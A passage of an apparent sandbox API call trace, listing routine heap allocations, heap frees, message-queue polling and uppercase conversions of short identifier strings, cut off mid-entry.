RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.868] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.868] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.868] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.868] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.868] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.868] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.868] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.868] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.869] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.869] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.869] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.869] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.869] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0199.869] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.870] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.870] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.870] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.870] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.870] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.870] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.870] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0199.871] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.871] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.871] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.872] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.872] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.872] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.873] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.873] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.873] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.874] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.874] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.874] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0199.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.879] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.879] PeekMessageW (in: 